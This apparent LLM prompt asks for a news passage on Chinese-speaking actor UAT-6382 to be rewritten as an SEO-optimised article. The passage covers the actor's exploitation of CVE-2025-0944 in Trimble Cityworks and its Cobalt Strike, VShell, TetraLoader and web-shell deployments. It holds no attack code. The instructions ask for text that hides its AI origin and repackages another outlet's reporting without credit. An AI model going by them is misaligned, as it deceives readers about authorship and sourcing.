gpt]
Rewrite the content fetched from
A Chinese-speaking threat actor tracked as UAT-6382 has been linked to the exploitation of a now-patched remote-code-execution vulnerability in Trimble Cityworks to deliver Cobalt Strike and VShell.
“UAT-6382 successfully exploited CVE-2025-0944, conducted reconnaissance, and rapidly deployed a variety of web shells and custom-made malware to maintain long-term access,” Cisco Talos researchers Asheer Malhotra and Brandon White said in an analysis published today. “Upon gaining access, UAT-6382 expressed a clear interest in pivoting to systems related to utility management.”
The network security company said it observed the attacks targeting enterprise networks of local governing bodies in the United States starting January 2025.
CVE-2025-0944 (CVSS score: 8.6) refers to the deserialization of untrusted data vulnerability affecting the GIS-centric asset management software that could enable remote code execution. The vulnerability, since patched, was added to the Known Exploited Vulnerabilities (KEV) catalog by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) in February 2025.
According to indicators of compromise (IoCs) released by Trimble, the vulnerability has been exploited to deliver a Rust-based loader that launches Cobalt Strike and a Go-based remote access tool named VShell in an attempt to maintain long-term access to infected systems.
Cisco Talos, which is tracking the Rust-based loader as TetraLoader, said it’s built using MaLoader, a publicly available malware-building framework written in Simplified Chinese that first appeared on GitHub in December 2024.
Successful exploitation of the vulnerable Cityworks application results in the threat actors conducting preliminary reconnaissance to identify and fingerprint the server, and then dropping web shells like AntSword, chinatso/Chopper, and Behinder that are widely put to use by Chinese hacking groups.
“UAT-6382 enumerated multiple directories on servers of interest to identify files of interest to them and then staged them in directories where they had deployed web shells for easy exfiltration,” the researchers said. “UAT-6382 downloaded and deployed multiple backdoors on compromised systems via PowerShell.”
into a completely fresh, human-written article that feels authentic and naturally written. The tone must reflect everyday human communication—professional, clear, and engaging without sounding like it’s generated by AI. Strictly avoid generic AI-style phrases, exaggerations, filler lines, or hallucinated content.
Structure the article with appropriate subheadings (H2, H3, etc.) and ensure it is *at least 500 words*. Each paragraph should be well-structured, focusing on a specific angle or detail from the source.
Incorporate *high-ranking SEO keywords* relevant to the topic where naturally appropriate—never forced. Prioritize keyword-rich phrases commonly searched online while maintaining readability and flow.
Use real-world phrasing, straight facts, and simple but intelligent language as used in human-authored blogs or news articles. Avoid summaries or conclusions; focus purely on rewriting the key points into a compelling narrative without inventing new ideas.
Do not add your own opinions or additional content—strictly rephrase and rewrite the original source material in a fresh, optimized, and human-sounding format.
[/gpt3]
